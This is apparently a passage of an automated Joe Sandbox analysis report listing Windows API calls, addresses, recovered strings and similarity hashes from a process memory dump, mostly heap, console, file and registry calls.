                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 000472AF
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 000472B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      • Opcode ID: f73a671a1a5c2aed0a1fea067dc53ecfe09fc204121f59c54195d2e3114e2944
                                                                      • Instruction ID: 37f28b9468488fa439ae3e97e8a88618aca8bb25411c1a311adc61f12b445e97
                                                                      • Opcode Fuzzy Hash: f73a671a1a5c2aed0a1fea067dc53ecfe09fc204121f59c54195d2e3114e2944
                                                                      • Instruction Fuzzy Hash: 2B11E6B16082009BEF24AF649909B7A3BE1FF86311F14446DF5DF8B252CB68D842D765
                                                                      APIs
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,0004BDB3,00000000,?), ref: 0004DD37
                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0004DD3E
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0004DD53
                                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0004DD5A
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocSize
                                                                      • String ID:
                                                                      • API String ID: 2549470565-0
                                                                      • Opcode ID: 07c7408334fdca2bcdad5b990479da4e1e71d946e55099e1837ad02aa9e9eb83
                                                                      • Instruction ID: 1783fbc3e5d00b8356e0e9393720992d534136ffe896fd9db610da897edb1271
                                                                      • Opcode Fuzzy Hash: 07c7408334fdca2bcdad5b990479da4e1e71d946e55099e1837ad02aa9e9eb83
                                                                      • Instruction Fuzzy Hash: A301B5B2B002019BEB219B54EC8CF9A77A8FB85756F200037F509C7150D739DC48D795
                                                                      APIs
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00048A51), ref: 000684B9
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00048A51), ref: 000684C6
                                                                      • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00048A51), ref: 000684EA
                                                                      • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00048A51), ref: 000684F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                      • String ID:
                                                                      • API String ID: 1033415088-0
                                                                      • Opcode ID: 9cc460acfc29f96123811325668d4c1079c020789cadb2b7e99b53b2ea97f2d7
                                                                      • Instruction ID: 3af81cd0e0924d19802c1523a8c6b4cbd2a8b0d116ef0a59ed9fe148547cae99
                                                                      • Opcode Fuzzy Hash: 9cc460acfc29f96123811325668d4c1079c020789cadb2b7e99b53b2ea97f2d7
                                                                      • Instruction Fuzzy Hash: EA014471A01119AFAB059B749C88AFFB7ECFF4E311B00412AFA02D6151EF699D06C765
                                                                      APIs
                                                                        • Part of subcall function 00050060: wcschr.MSVCRT ref: 0005006C
                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000,00000000,00000000), ref: 00055678
                                                                      • _open_osfhandle.MSVCRT ref: 0005568C
                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 000556A2
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0006122B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                      • String ID:
                                                                      • API String ID: 22757656-0
                                                                      • Opcode ID: cd9c4200558e88f4b8f345b0ab8b275d7af8a3844a5413572456d92c97f361d2
                                                                      • Instruction ID: 247cb7609efbcfcf94e4a37bc7f439af1940ef517c876639d2fd2881dd32a4c6
                                                                      • Opcode Fuzzy Hash: cd9c4200558e88f4b8f345b0ab8b275d7af8a3844a5413572456d92c97f361d2
                                                                      • Instruction Fuzzy Hash: 3801A771904610AEE7206BA89C4DB9F7BB8E741776F204216F961E31E0D7B858458B91
                                                                      APIs
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,000622F8), ref: 00062514
                                                                      • RtlFreeHeap.NTDLL(00000000,?,?), ref: 0006251B
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,000622F8), ref: 00062539
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00062540
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      • Opcode ID: a8a3300247d63e5ad35a73a23bb929089262408f7cb368a7055557db438887aa
                                                                      • Instruction ID: 565996e0562a5479c9c7efa7dae4918c748191453070ad0d8e1d76e7027f4fc1
                                                                      • Opcode Fuzzy Hash: a8a3300247d63e5ad35a73a23bb929089262408f7cb368a7055557db438887aa
                                                                      • Instruction Fuzzy Hash: AEF06872610601AFEB249FA0DC8CB56B7F9FF49312F10051EE141C6540D778E955CBA1
                                                                      APIs
                                                                        • Part of subcall function 00056F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00056F4F
                                                                      • __set_app_type.MSVCRT ref: 00056872
                                                                      • __p__fmode.MSVCRT ref: 00056888
                                                                      • __p__commode.MSVCRT ref: 00056896
                                                                      • __setusermatherr.MSVCRT ref: 000568B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                      • String ID:
                                                                      • API String ID: 1632413811-0
                                                                      • Opcode ID: ec7d385918b127e51709403f5b20af62ecde65e1294e808da054b97564bb57b5
                                                                      • Instruction ID: 388b03018b9ee6a0e4671c6a4e565557091ca1c025520ac47fdaa63612a4ef70
                                                                      • Opcode Fuzzy Hash: ec7d385918b127e51709403f5b20af62ecde65e1294e808da054b97564bb57b5
                                                                      • Instruction Fuzzy Hash: 58F0FE386043408FF7146F30FD0A6453B62B706362B400A1AF861862F2EFBE9144CB02
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 0004824E
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00048256
                                                                      • _get_osfhandle.MSVCRT ref: 00048264
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0004826C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 1606018815-0
                                                                      • Opcode ID: cbbd9e328086bf3df2c15bf64f061f860bd2decdd0a4e1d8605c9435cea28276
                                                                      • Instruction ID: 4ac0f711cbad7fd75209a011cded1e4c0f293503e096626574d44cbd5da60ff5
                                                                      • Opcode Fuzzy Hash: cbbd9e328086bf3df2c15bf64f061f860bd2decdd0a4e1d8605c9435cea28276
                                                                      • Instruction Fuzzy Hash: 39E026B1A04604EFFB049BA0FD1DE553B64F749316B00451AF249965B1DBBD54409F12
                                                                      APIs
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,0004729C), ref: 000472CF
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 000472D6
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 000472DF
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 000472E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      • Opcode ID: 503802eb26ae87e1f0ea46c858f8971288494aa7bfe2881390c781bdf2762acf
                                                                      • Instruction ID: 5aa23364d2c73182bb12cfc332c0b24d45a562137a1f620df4cfa945611a16ba
                                                                      • Opcode Fuzzy Hash: 503802eb26ae87e1f0ea46c858f8971288494aa7bfe2881390c781bdf2762acf
                                                                      • Instruction Fuzzy Hash: DFD09232605110ABFE503FA0AC0DB863A28FB4A212F010402B28582660CABC48008B62
                                                                      APIs
                                                                        • Part of subcall function 0004DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000), ref: 0004DCE1
                                                                        • Part of subcall function 0004DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000), ref: 0004DCE8
                                                                        • Part of subcall function 0004A62F: wcschr.MSVCRT ref: 0004A635
                                                                        • Part of subcall function 0004C570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0004C5BD
                                                                        • Part of subcall function 0004C570: RtlFreeHeap.NTDLL(00000000), ref: 0004C5C4
                                                                        • Part of subcall function 0004C570: _setjmp3.MSVCRT ref: 0004C630
                                                                      • _wcsupr.MSVCRT ref: 0005C21F
                                                                        • Part of subcall function 00051A47: memset.MSVCRT ref: 00051AE2
                                                                        • Part of subcall function 00051A47: ??_V@YAXPAX@Z.MSVCRT(00052229,?,00052229,00000000,-00000105,?,00000000,00000000), ref: 00051BA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                                                      • String ID: FOR$ IF
                                                                      • API String ID: 3818062306-2924197646
                                                                      • Opcode ID: 54b370ff66d42696e14622cc92f427701b12dedbf370d3a6e9e819fa28e21e74
                                                                      • Instruction ID: 91545fc35c0754c8c8a302062b1c1e843bb4f817aa1a4e439ee2e7a150e929d3
                                                                      • Opcode Fuzzy Hash: 54b370ff66d42696e14622cc92f427701b12dedbf370d3a6e9e819fa28e21e74
                                                                      • Instruction Fuzzy Hash: 225115B1B007025AEBB57B78C851BBB22E2EF91754F580039ED06CB295FB66DD41C388
                                                                      APIs
                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,0006CD40,0000001C,00066901), ref: 000656A8
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00065778
                                                                        • Part of subcall function 000664DB: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 0006650F
                                                                        • Part of subcall function 000664DB: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0006CD00), ref: 00066545
                                                                        • Part of subcall function 000664DB: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0006CD00,00000018,?,?,0005BFD6), ref: 00066553
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$Close$CreateOpenValueiswspace
                                                                      • String ID: Software\Classes
                                                                      • API String ID: 1047774138-1656466771
                                                                      • Opcode ID: 093e5aefc510a0822f752f10e987e883106c3db57bcbb47d73b89f76e42f66e0
                                                                      • Instruction ID: f97b71d0a7ec7030560cd012945c2a921933789ce80132efd8f66825e1ce7a23
                                                                      • Opcode Fuzzy Hash: 093e5aefc510a0822f752f10e987e883106c3db57bcbb47d73b89f76e42f66e0
                                                                      • Instruction Fuzzy Hash: BA315471F48714CBDB58ABB8EC526ED76F2AF48711F14403EE502B7291EE755C008B64
                                                                      APIs
                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,0006CCE0,0000001C,00066931), ref: 00065E32
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00065EFB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$CloseOpeniswspace
                                                                      • String ID: Software\Classes
                                                                      • API String ID: 2439148603-1656466771
                                                                      • Opcode ID: c851756cfe5e348a036be7c7c2d901fd2309b2041422b5617e7129bba93860e6
                                                                      • Instruction ID: b2a22cc6d9b6b5954803e027f49e8fe0dd8cb68ccd87ee4df695b1ac1a1fea73
                                                                      • Opcode Fuzzy Hash: c851756cfe5e348a036be7c7c2d901fd2309b2041422b5617e7129bba93860e6
                                                                      • Instruction Fuzzy Hash: 20316471F546148BDF58EFA8DC526EE76B2AF48711F10403EE406B7292EE765D008B68
                                                                      APIs
                                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,0004B11F), ref: 0005CB8B
                                                                      • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 0005CC2D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleTitle
                                                                      • String ID: -
                                                                      • API String ID: 3358957663-3695764949
                                                                      • Opcode ID: 51dc6fdd16e8c4189956407539040cd3a831e3eb8b054b576ed990ad8963f13d
                                                                      • Instruction ID: f221d140ab8be587f7d7eef5ee1be0721d40edcdd091410b427eb2d3505a37a8
                                                                      • Opcode Fuzzy Hash: 51dc6fdd16e8c4189956407539040cd3a831e3eb8b054b576ed990ad8963f13d
                                                                      • Instruction Fuzzy Hash: 92213771B002048BE729AB2CD895BBF77E2EBC5305F18403DE8075B246DA799D86C786
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00068AC9
                                                                      • printf.MSVCRT ref: 00068B24
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                                                      • String ID: %3d
                                                                      • API String ID: 2845598586-2138283368
                                                                      • Opcode ID: 7326be70d1dee84f0374156b8b92cf7b9436af129c2fb64f4ea530a2421291e2
                                                                      • Instruction ID: 6ea6252c5a4094524f267988dac5e081ded8e2fb4fb0d5f8bdf4163b4a899aae
                                                                      • Opcode Fuzzy Hash: 7326be70d1dee84f0374156b8b92cf7b9436af129c2fb64f4ea530a2421291e2
                                                                      • Instruction Fuzzy Hash: B70149B1640204BBF7216E959C47FDB3AAEDB85BA0F044025FB08A5082D6B5AC60C776